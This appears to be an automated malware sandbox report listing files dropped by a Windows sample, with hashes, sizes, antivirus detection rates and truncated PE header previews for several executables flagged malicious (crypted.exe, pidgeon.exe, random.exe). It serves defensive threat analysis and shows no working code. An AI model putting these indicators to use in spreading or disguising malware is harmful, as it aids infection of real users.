                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ........................+......"+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...lvwzwdeg..*.......*..:..............@...pkeeaqxp. ...`+.......*.............@....taggant.@....+.."....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):257872
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\crypted[1].exe

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):3186688
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.1453988376504896
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:QQV7TKuuwJXLPqJpdgEzr4bAl8w7H0ZDMOXvsELUPeX4Fm03:9LPqVgEGL7QBWID3
                                                                                                                                                                                                                                                                                        MD5:1DA8B17CBBAEC15188A82B2339A7977F
                                                                                                                                                                                                                                                                                        SHA1:A5AC45156F3BFE959C0AA56871F53A51AD163B3D
                                                                                                                                                                                                                                                                                        SHA-256:02CDC29204AEF0D475C62C7DD9AD08EBFE8B39521D6CE57C1E7AE73FEE7146F0
                                                                                                                                                                                                                                                                                        SHA-512:6518D2C6586F0AA1553DCC08519B697DB81FF79FFA0D81A020CE870A1905BB2B63BF22BC334D241843EE0A087AB1A8C040C7B0327D33CFCF87F9BFF32BCC3DD3
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....2g..................*..`......P=)...........@...........................1...........@.................................\.+.<............................ ,..U.......................... S+.....@.*............. .+..............................text....*.......*................. ..`.rdata........*.......*.............@..@.data....O....+..&....+.............@....00cfg........,.......+.............@..@.tls..........,.......+.............@....reloc...U... ,..V....+.............@..B.TON..........,.......,.............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1787
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.383232153970428
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:48:SfNaoQpLTEQzwfNaoQkQOfNaoQ9Q5fNaoQH0UrU0U8Qm:6NnQ1TEQYNnQkQ2NnQ9QVNnQH0UrU0Uu
                                                                                                                                                                                                                                                                                        MD5:08E55D0314DE19C21967A5EFF4E06BB8
                                                                                                                                                                                                                                                                                        SHA1:BE0996F0CA1026C0E57A90EC38E51E30E577153F
                                                                                                                                                                                                                                                                                        SHA-256:79AE55A4B3E453AC105FB8E57E6752CD6F65A048601BF619DB1AAB33659339E8
                                                                                                                                                                                                                                                                                        SHA-512:4DE12EC362FC4602C1BBEDF24B275BB3BB23F59B7C614BC0584238CD72AFE025E8D322C04B01E21FABB90C7DE80D8B63FDDF352C6B598B6502116063ADD11343
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/713B8B87D8E85FE37742FD15F3F63191",.. "id": "713B8B87D8E85FE37742FD15F3F63191",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/713B8B87D8E85FE37742FD15F3F63191"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/51078815E9A18251A5E727DFACDF920D",.. "id": "51078815E9A18251A5E727DFACDF920D",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/51078815E9A18251A5E727DFACDF920D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1802752
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.945562116457548
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:qwPreIPGaMFhWe/GFSHb5L2aoVU+qzg3gHVf1S:rTeIPxq5poU5gAZ1S
                                                                                                                                                                                                                                                                                        MD5:FE83CBC9270910772B2028F38444BB7F
                                                                                                                                                                                                                                                                                        SHA1:B9A3FD9E948B88A25C4C588C6E01FB3BD129902B
                                                                                                                                                                                                                                                                                        SHA-256:D541C198374D012B7C58B1231B78818194DDA9F43E8758DF7B2A2E723F97B86B
                                                                                                                                                                                                                                                                                        SHA-512:D1E3DBAE8DFEF1DD0689E37471277DE47A35C8E102BF44B7BE931231E94B1FAA6F5803F9CB1FC8ADA2792531F48C761375BD2199B267A0AD97BCFEF7ADF3E06B
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g.....................@"......@i...........@..........................pi...........@.................................M.$.a.............................$..................................................................................... . ..$......b..................@....rsrc ......$......r..............@....idata ......$......r..............@... ..*...$......t..............@...gcuyxxju.....@O......v..............@...busnlrvl.....0i......\..............@....taggant.0...@i.."...`..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:@...e...........................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\SystemData\system.dat

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe
                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):270
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.4565589154850755
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6:Qa3iTui7o6lwxlB600aWLsmC2VjezvhYX6La5LdtghdbETywlV6F4l:QUiTKf15xWLsPv+R5L8xE+vCl
                                                                                                                                                                                                                                                                                        MD5:0F1234A148F837C255122E7E537C2EF1
                                                                                                                                                                                                                                                                                        SHA1:F9A78CE1B1710E7BA67A6F7DBAF22C5EC39F458A
                                                                                                                                                                                                                                                                                        SHA-256:5FDEA49882DD1425924CE31AE307331FCF9857340DE2BD5C0429A0F460D9517E
                                                                                                                                                                                                                                                                                        SHA-512:92919180ED4F1B95E6994CF86792D165A5E0FAF68B2DB62CCC32E680AA59EE37B5349BB17C223E296618CA9D7AA3F69A56417FDF1984000EBF18078DB083F58C
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:............z..O..........'pK."..............U.U.I.D....f...... .../.z.;S}.o...p.H.H..;.~.....).Rc............ ......<..z.........U.....9...k.0.........2..7......~..M.eu..X.VM...h....1{r...@.....Pi#..w.P.nV.|..62....u.......W.".m%.L..G...f..i.R..?.G...S^1

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):17547264
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.5040419038866615
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:98304:B07UyxIHbmjUDWr0OyJEMYbqVGevIZm2nM7vK0Mr5xUEvnDG8yf569uidQI:Q9IHS0Wr0OqUqbAZm2H0a5x9vnD0Uu
                                                                                                                                                                                                                                                                                        MD5:27DA32557EF397101BD519D5A3E00180
                                                                                                                                                                                                                                                                                        SHA1:35338A9C8E6410DC2E9B90A11A15FA2EBC6AD861
                                                                                                                                                                                                                                                                                        SHA-256:56C566348B994A79C0B6FADECB435141830C938469FC607F98C8AAE838711F69
                                                                                                                                                                                                                                                                                        SHA-512:A38448584807B7E137F4F467F3188EC4B6C02BE497643B2F45F02908EF0E9CF2F6B84A543ACC7354B8FF0F37EADFB47345D55866C9F93C1F089F80062A5BC6FA
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....1g.........."..........e..............@..............................0.......................@............... ...........................S........E.....8e..............-.............................(...................................................text............................. ..`.data............................@....bss.....................................idata...S.......T..................@....didata............................@....edata...............|..............@..@.tls.....................................rdata..m...........~..............@..@.reloc...-.........................@..B.pdata..8e.......f..................@..@.rsrc.....E.......E.................@..@.............0......................@..@

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):3186688
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.1453988376504896
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:QQV7TKuuwJXLPqJpdgEzr4bAl8w7H0ZDMOXvsELUPeX4Fm03:9LPqVgEGL7QBWID3
                                                                                                                                                                                                                                                                                        MD5:1DA8B17CBBAEC15188A82B2339A7977F
                                                                                                                                                                                                                                                                                        SHA1:A5AC45156F3BFE959C0AA56871F53A51AD163B3D
                                                                                                                                                                                                                                                                                        SHA-256:02CDC29204AEF0D475C62C7DD9AD08EBFE8B39521D6CE57C1E7AE73FEE7146F0
                                                                                                                                                                                                                                                                                        SHA-512:6518D2C6586F0AA1553DCC08519B697DB81FF79FFA0D81A020CE870A1905BB2B63BF22BC334D241843EE0A087AB1A8C040C7B0327D33CFCF87F9BFF32BCC3DD3
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....2g..................*..`......P=)...........@...........................1...........@.................................\.+.<............................ ,..U.......................... S+.....@.*............. .+..............................text....*.......*................. ..`.rdata........*.......*.............@..@.data....O....+..&....+.............@....00cfg........,.......+.............@..@.tls..........,.......+.............@....reloc...U... ,..V....+.............@..B.TON..........,.......,.............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):3135488
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.646511400069138
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:tbHBc8XMZ9OolllcgGfZ1P12Dh38zEpvnub+KYxeGpIH3/PCM:trSi49O+lyXfZX2Dh38IpG6KYxeGqX/a
                                                                                                                                                                                                                                                                                        MD5:FAD8A273ED15C30E16C4BA0C776A9727
                                                                                                                                                                                                                                                                                        SHA1:EEDF4978CB6CFB020C1F0CC552C2AD2CF238C72C
                                                                                                                                                                                                                                                                                        SHA-256:E38CB6ED4B58F8B2F61D3CA1F11385DBCC184B948C88ADA6B68C0763A2EF31C9
                                                                                                                                                                                                                                                                                        SHA-512:6C6F034C5B2541999BE44D6C85EDC0BABFEF513300EF223238691CD9C0F66F035DB41016429DB7DF67FC9E2A1FAE0BE9AFD8BCF3CEBDB5FE2F5FC308497013E4
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............/...........@...........................0.....r./...@.................................T...h.......@........................................................................................................... . ............................@....rsrc...@...........................@....idata ............................@...htwuwyzf. *.......*.................@...dhfttsvz....../......./.............@....taggant.0..../.."..../.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1802752
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.945562116457548
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:qwPreIPGaMFhWe/GFSHb5L2aoVU+qzg3gHVf1S:rTeIPxq5poU5gAZ1S
                                                                                                                                                                                                                                                                                        MD5:FE83CBC9270910772B2028F38444BB7F
                                                                                                                                                                                                                                                                                        SHA1:B9A3FD9E948B88A25C4C588C6E01FB3BD129902B
                                                                                                                                                                                                                                                                                        SHA-256:D541C198374D012B7C58B1231B78818194DDA9F43E8758DF7B2A2E723F97B86B
                                                                                                                                                                                                                                                                                        SHA-512:D1E3DBAE8DFEF1DD0689E37471277DE47A35C8E102BF44B7BE931231E94B1FAA6F5803F9CB1FC8ADA2792531F48C761375BD2199B267A0AD97BCFEF7ADF3E06B
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g.....................@"......@i...........@..........................pi...........@.................................M.$.a.............................$..................................................................................... . ..$......b..................@....rsrc ......$......r..............@....idata ......$......r..............@... ..*...$......t..............@...gcuyxxju.....@O......v..............@...busnlrvl.....0i......\..............@....taggant.0...@i.."...`..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):2823680
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.504495616485594
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:LkI+zHJAjhJNh3KPc/uIGsN0orLDYvlsbRq:LkIiJA1JNh3KP1dsqorXyH
                                                                                                                                                                                                                                                                                        MD5:247F995931CCF613FE7C4DF0FC6DBAF0
                                                                                                                                                                                                                                                                                        SHA1:0060B3E40596BB0031A983195094BDFC57E554A6
                                                                                                                                                                                                                                                                                        SHA-256:3040D190FDEA818DBEEFA014B634077003EA442164E4FEBAD82D6CF00D34BBD7
                                                                                                                                                                                                                                                                                        SHA-512:B9266DDF78A39B7E244E8410F3EE743BC7B1AA98F237B7660C6B63FB670F3712120265FD2AF4B21BB5519DDEB6421ACCA0E42F6CE4B57F06D7A9AFA838894D47
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ........................+......"+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...lvwzwdeg..*.......*..:..............@...pkeeaqxp. ...`+.......*.............@....taggant.@....+.."....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2unsaoqc.clt.psm1

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_elm4racz.5rf.ps1

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f44q0gio.0jg.ps1

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2k0a3kr.tnd.psm1

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                                                                                                                                                                                        Download File
